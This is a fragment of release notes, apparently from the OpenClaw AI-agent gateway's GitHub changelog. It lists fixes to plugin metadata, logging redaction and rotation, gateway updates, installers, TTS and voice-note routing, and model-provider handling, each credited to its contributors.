<li>Plugins/CLI: preserve manifest name, description, format, and source metadata in cold <code>openclaw plugins list</code> output without importing plugin runtime. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Security/audit: read channel exposure and plugin allowlist ownership from read-only plugin index metadata so cold audits do not depend on loaded channel runtime. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/chat: keep <code>/plugins list</code>, <code>/plugins enable</code>, and <code>/plugins disable</code> on the persisted plugin index path so chat plugin management does not load diagnostic/runtime plugin registries before execution. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/doctor: read workspace plugin status and legacy web-search ownership through installed-index manifest metadata instead of broad manifest registry scans. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/agents: read channel provider status from read-only plugin index metadata for text <code>agents list</code> output instead of the loaded channel registry. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Logging: redact configured secret patterns at console and file-log sink exits so credentials that reach the logger are masked before terminal display or JSONL persistence. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4279976745" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67953" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67953/hovercard" href="https://github.com/openclaw/openclaw/issues/67953">#67953</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ziy1-Tan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ziy1-Tan">@Ziy1-Tan</a>.</li>
<li>Gateway/services: refuse process and service mutations from an older OpenClaw binary when the config was last written by a newer version, preventing split-brain installs from stopping or rewriting newer gateway services. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4164454666" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57079" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/57079/hovercard" href="https://github.com/openclaw/openclaw/issues/57079">#57079</a>.</li>
<li>Gateway: reserve <code>/healthz</code> and <code>/readyz</code> ahead of plugin, canvas, and Control UI HTTP stages so liveness/readiness probes still answer when a later route handler stalls. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4301852326" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69674" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69674/hovercard" href="https://github.com/openclaw/openclaw/issues/69674">#69674</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Xike-Creek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Xike-Creek">@Xike-Creek</a>.</li>
<li>Logging: load <code>logging.file</code> and redaction settings directly from the active OpenClaw config path in bundled runtimes, so packaged gateways stop falling back to <code>/tmp/openclaw</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4191142978" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59370" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59370/hovercard" href="https://github.com/openclaw/openclaw/issues/59370">#59370</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4268830246" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67168" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67168/hovercard" href="https://github.com/openclaw/openclaw/issues/67168">#67168</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4207216477" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61295" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61295/hovercard" href="https://github.com/openclaw/openclaw/issues/61295">#61295</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/KeaneYan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/KeaneYan">@KeaneYan</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Pan9hu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Pan9hu">@Pan9hu</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zsjlovelike/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zsjlovelike">@zsjlovelike</a>.</li>
<li>Logging: rotate file logs at <code>logging.maxFileBytes</code>, keep bounded numbered archives, and make long-lived rolling loggers follow the current-day file instead of suppressing diagnostics or writing stale dated files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4182641485" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58583" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58583/hovercard" href="https://github.com/openclaw/openclaw/issues/58583">#58583</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4216327509" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62381" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62381/hovercard" href="https://github.com/openclaw/openclaw/issues/62381">#62381</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jpeghead/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jpeghead">@jpeghead</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhaoleink/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhaoleink">@zhaoleink</a>.</li>
<li>Agents/groups: treat clean empty assistant stops as silent <code>NO_REPLY</code> only for always-on groups where silent replies are allowed, while keeping direct and mention-gated sessions on the incomplete-turn retry path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MagnaAI/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MagnaAI">@MagnaAI</a>.</li>
<li>macOS/Node: keep native remote app nodes from advertising <code>browser.proxy</code>, start browser-capable CLI node services through the restored <code>openclaw node start</code> command, and show an actionable browser-control error when the local control service is missing. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4263105927" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66637" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66637/hovercard" href="https://github.com/openclaw/openclaw/issues/66637">#66637</a>.</li>
<li>Gateway/update: fail package updates when the restarted managed gateway reports the wrong version, including fallback restarts and JSON mode, avoiding false-success mixed-version restarts after macOS LaunchAgent updates. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329551146" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71835" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71835/hovercard" href="https://github.com/openclaw/openclaw/issues/71835">#71835</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/abhinas90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/abhinas90">@abhinas90</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jsompis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jsompis">@jsompis</a>.</li>
<li>Gateway/update: warn before package updates and bundled plugin runtime-dependency repairs when the target volume appears low on disk space, without blocking installs on best-effort filesystem checks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329551146" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71835" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71835/hovercard" href="https://github.com/openclaw/openclaw/issues/71835">#71835</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/abhinas90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/abhinas90">@abhinas90</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jsompis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jsompis">@jsompis</a>.</li>
<li>Plugins/runtime deps: surface activated plugin load failures in health and fail package-update restart verification or doctor repair when bundled runtime deps still cannot load, avoiding false-success repairs. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329764229" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71883" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71883/hovercard" href="https://github.com/openclaw/openclaw/pull/71883">#71883</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Solvely-Colin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Solvely-Colin">@Solvely-Colin</a>.</li>
<li>Gateway/Linux: include fnm <code>aliases/default/bin</code> in generated service PATHs and let doctor accept either modern fnm aliases or the legacy <code>current/bin</code> symlink, avoiding false PATH repair prompts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4283558641" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68169" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68169/hovercard" href="https://github.com/openclaw/openclaw/issues/68169">#68169</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/richard-scott/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/richard-scott">@richard-scott</a>.</li>
<li>Installer/Linux: run apt installs with noninteractive dpkg and needrestart settings so fresh Ubuntu 24.04 <code>curl | bash</code> installs do not hang while installing Node.js, Git, or build tools. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4046027578" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41146" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41146/hovercard" href="https://github.com/openclaw/openclaw/issues/41146">#41146</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iht76/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iht76">@iht76</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexcarv318/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexcarv318">@alexcarv318</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cs3gallery/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cs3gallery">@cs3gallery</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/firofame/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/firofame">@firofame</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cgdusek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cgdusek">@cgdusek</a>.</li>
<li>Providers/Bedrock: defer the AWS SDK import until Bedrock discovery actually runs so plugin registration and setup stay lightweight on cold start. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328833605" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71690" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71690/hovercard" href="https://github.com/openclaw/openclaw/issues/71690">#71690</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jarvis-ai-gregmoser/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jarvis-ai-gregmoser">@jarvis-ai-gregmoser</a>.</li>
<li>Installer/macOS: stop immediately when Homebrew <code>node@24</code> installation fails and avoid printing PATH advice for missing Homebrew Node installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312670571" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70411" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70411/hovercard" href="https://github.com/openclaw/openclaw/issues/70411">#70411</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/1fanwang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/1fanwang">@1fanwang</a>.</li>
<li>WhatsApp: remove ack reactions after a visible reply when <code>messages.removeAckAfterReply</code> is enabled, matching other reaction-capable channels. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3987412583" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/26183" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/26183/hovercard" href="https://github.com/openclaw/openclaw/issues/26183">#26183</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MrUnforsaken/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MrUnforsaken">@MrUnforsaken</a>.</li>
<li>Providers/Z.AI: map OpenClaw thinking controls to Z.AI's <code>thinking</code> payload and add opt-in preserved thinking replay via <code>params.preserveThinking</code>, so GLM 5.x can keep prior <code>reasoning_content</code> when requested. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4183616844" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58680" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58680/hovercard" href="https://github.com/openclaw/openclaw/issues/58680">#58680</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xuanmingguo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xuanmingguo">@xuanmingguo</a>.</li>
<li>Channels/status: keep read-only channel lists on manifest and package metadata by default, loading setup runtime only for explicit fallback callers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins: scope setup and web-provider metadata manifest reads to explicit plugin ids when callers already know the owning plugin set. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/onboarding: defer onboarding install-record index writes until the guarded config commit so setup failures cannot leave the plugin index ahead of <code>openclaw.json</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/registry: resolve web provider ownership from the installed plugin index instead of broad manifest scans on secret, tool, and pricing paths. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Config/providers: accept <code>video</code> and <code>audio</code> in configured model <code>input</code> values and preserve them in provider catalog entries. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3961456155" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/20721" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/20721/hovercard" href="https://github.com/openclaw/openclaw/issues/20721">#20721</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alvinttang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alvinttang">@alvinttang</a>.</li>
<li>Models/auth: honor the parent <code>--agent</code> flag for auth write commands (<code>add</code>, <code>login</code>, <code>setup-token</code>, <code>paste-token</code>, and the GitHub Copilot shortcut) so OAuth/API-key/token results are written to the requested agent store instead of the default agent. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329713315" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71864" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71864/hovercard" href="https://github.com/openclaw/openclaw/issues/71864">#71864</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329952100" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71933" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71933/hovercard" href="https://github.com/openclaw/openclaw/pull/71933">#71933</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/balric-seo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/balric-seo">@balric-seo</a>.</li>
<li>TTS: strip model-emitted TTS directives from streamed block text before channel delivery, including directives split across adjacent blocks, while preserving the accumulated raw reply for final-mode synthesis. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4038643518" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/38937" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/38937/hovercard" href="https://github.com/openclaw/openclaw/issues/38937">#38937</a>.</li>
<li>TTS: keep explicit <code>provider=...</code> directive keys scoped to that provider and warn on unsupported keys instead of letting another speech provider consume overlapping keys. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4198945704" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60131" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60131/hovercard" href="https://github.com/openclaw/openclaw/issues/60131">#60131</a>.</li>
<li>TTS/Feishu: normalize final-mode streamed TTS-only audio before delivery so generated voice-note files use the same safe media path and native voice routing as normal final replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329908441" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71920" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71920/hovercard" href="https://github.com/openclaw/openclaw/issues/71920">#71920</a>.</li>
<li>Feishu: transcribe inbound voice-note audio with the shared media audio path before agent dispatch and keep raw Feishu <code>file_key</code> payloads out of message text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4268134631" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67120" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67120/hovercard" href="https://github.com/openclaw/openclaw/issues/67120">#67120</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4211680654" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61876" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61876/hovercard" href="https://github.com/openclaw/openclaw/issues/61876">#61876</a>.</li>
<li>Tasks: terminalize async Gateway agent task records from the Gateway run result while preserving aborted, failed, and cancelled outcomes instead of leaving completed runs stuck as active or lost. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329869944" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71905" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71905/hovercard" href="https://github.com/openclaw/openclaw/pull/71905">#71905</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/likewen-tech/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/likewen-tech">@likewen-tech</a>.</li>
<li>WhatsApp: let authorized group voice-note transcripts satisfy mention gating before reply dispatch, while keeping unmentioned transcripts in pending group history. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4069891043" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44908" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44908/hovercard" href="https://github.com/openclaw/openclaw/issues/44908">#44908</a>.</li>
<li>Media understanding: carry channel voice-note preflight state into attachment selection so WhatsApp, Feishu, Telegram, and Discord do not transcribe the same inbound audio twice. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4315503496" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70580" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70580/hovercard" href="https://github.com/openclaw/openclaw/issues/70580">#70580</a>.</li>
<li>TTS/BlueBubbles: deliver compatible auto-TTS audio as iMessage voice memo bubbles instead of plain MP3/CAF file attachments. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3943170481" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/16848" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/16848/hovercard" href="https://github.com/openclaw/openclaw/issues/16848">#16848</a>.</li>
<li>TTS: resolve voice-note and voice-memo routing from channel plugin capabilities instead of speech-core-owned channel id lists.</li>
<li>ACP: send subagent and async-task completion wakes to external ACP harnesses as plain prompts instead of OpenClaw internal runtime-context envelopes, while keeping those envelopes out of ACP transcripts.</li>
<li>TTS/status: show configured TTS model, voice, and sanitized custom endpoint in <code>/status</code>, preserve OpenAI-compatible TTS instructions on custom endpoints, and retry empty Microsoft/Edge TTS output once. Addresses <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4076830177" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46602" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/46602/hovercard" href="https://github.com/openclaw/openclaw/issues/46602">#46602</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4078185482" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47232" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/47232/hovercard" href="https://github.com/openclaw/openclaw/pull/47232">#47232</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4063664533" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43936" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/43936/hovercard" href="https://github.com/openclaw/openclaw/pull/43936">#43936</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/leekuangtao/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/leekuangtao">@leekuangtao</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Huntterxx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Huntterxx">@Huntterxx</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rex993/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rex993">@rex993</a>.</li>
<li>Agents/Gateway: steer agent-driven config edits and restarts through the owner-only <code>gateway</code> tool, document <code>config.schema.lookup</code> as the field-doc source, and warn against using <code>gateway stop &amp;&amp; gateway start</code> as a restart substitute on macOS. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329939344" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71929" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71929/hovercard" href="https://github.com/openclaw/openclaw/issues/71929">#71929</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ygc3817922006-sketch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ygc3817922006-sketch">@ygc3817922006-sketch</a>.</li>
<li>Media understanding/audio: inject a deterministic transcript placeholder for too-small voice notes so agents do not hallucinate transcription or provider failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4087777845" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48944" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48944/hovercard" href="https://github.com/openclaw/openclaw/issues/48944">#48944</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eulicesl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eulicesl">@eulicesl</a>.</li>
<li>Providers/vLLM: send Nemotron 3 chat-template kwargs when thinking is off and honor configured <code>params.chat_template_kwargs</code> for OpenAI-compatible completions, so vLLM/Nemotron replies stay visible instead of becoming thinking-only. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329813098" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71891" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71891/hovercard" href="https://github.com/openclaw/openclaw/issues/71891">#71891</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jmystaki-create/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jmystaki-create">@jmystaki-create</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dennis-lynch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dennis-lynch">@dennis-lynch</a>.</li>
<li>Channels/replies: strip copied inbound metadata blocks from user-facing assistant replies and model replay history, so Discord/vLLM sessions do not leak <code>Conversation info</code> / <code>UNTRUSTED ... message body</code> envelopes after a model echoes them. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329636801" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71847" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71847/hovercard" href="https://github.com/openclaw/openclaw/issues/71847">#71847</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jmystaki-create/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jmystaki-create">@jmystaki-create</a>.</li>
<li>Subagents/memory: keep inter-session completion wakes out of memory and dreaming session exports, and strip internal runtime-context blocks from realtime Control UI chat events.</li>
<li>Agents/Claude: treat zero-token empty <code>stop</code> turns as failed provider output, retry once, repair replay, and allow configured model fallback instead of preserving them as successful silent replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329762708" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71880" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71880/hovercard" href="https://github.com/openclaw/openclaw/issues/71880">#71880</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MagnaAI/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MagnaAI">@MagnaAI</a>.</li>
<li>Tasks: normalize task lifecycle timestamps at create, update, and restore time, and report retained lost tasks as audit warnings until their cleanup window expires. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329725948" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71871" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71871/hovercard" href="https://github.com/openclaw/openclaw/pull/71871">#71871</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/likewen-tech/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/likewen-tech">@likewen-tech</a>.</li>
<li>Diagnostics/OTEL: treat normal early model stream cleanup as a completed model call instead of exporting a misleading <code>StreamAbandoned</code> error span. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/pairing: stop corrupt or unreadable device/node pairing stores from being treated as empty state, preserving <code>paired.json</code> for repair instead of overwriting approved pairings. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329738661" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71873" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71873/hovercard" href="https://github.com/openclaw/openclaw/issues/71873">#71873</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iret77/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iret77">@iret77</a>.</li>
<li>ACP: keep <code>/acp</code> management commands, plus local <code>/status</code> and <code>/unfocus</code>, on the Gateway path inside ACP-bound threads so they are not consumed as ACP prompt text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4259260856" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66298" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66298/hovercard" href="https://github.com/openclaw/openclaw/issues/66298">#66298</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kindomLee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kindomLee">@kindomLee</a>.</li>
